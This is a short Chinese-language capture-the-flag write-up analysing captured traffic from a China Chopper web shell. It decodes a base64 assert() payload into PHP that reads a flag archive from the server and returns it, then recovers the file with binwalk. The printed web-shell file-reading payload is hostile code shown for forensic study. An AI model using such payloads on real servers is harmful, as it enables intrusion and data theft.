Bugku 分析 中國菜刀
阿新 • • 發佈:2019-02-04
php代碼 play spa die() close ech res sse error:
解壓之後得到了一個流量包,只有不到10KB,美滋滋
先抓重點,過濾出http,只有6條數據記錄,3條post,3條response,3條post都是一樣的
隨便打開一條pos
是一個assert斷言,斷言內容是一串base64加密的字符串(最後的%3D先解碼為=)
得到了一串php代碼
@ini_set("display_errors","0"); @set_time_limit(0); if(PHP_VERSION<\‘5.3.0\‘) { @set_magic_quotes_runtime(0); }; echo("X@Y"); $F="C:\\\\wwwroot\\\\flag.tar.gz"; $fp=@fopen($F,\‘r\‘); if(@fgetc($fp)) { @fclose($fp); @readfile($F); } else { echo(\‘ERROR:// Can Not Read\‘); }; echo("X@Y"); die();
就是說打印一個叫flag(等等flag?)的文件,並在前後打印X@Y
快樂,只要找到flag.tar.gz就好了
最後一條response中就有這個文件
既然是一個文件中包含另一個文件,那就試一試binwalk
提取並解壓,即可得到flag
Bugku 分析 中國菜刀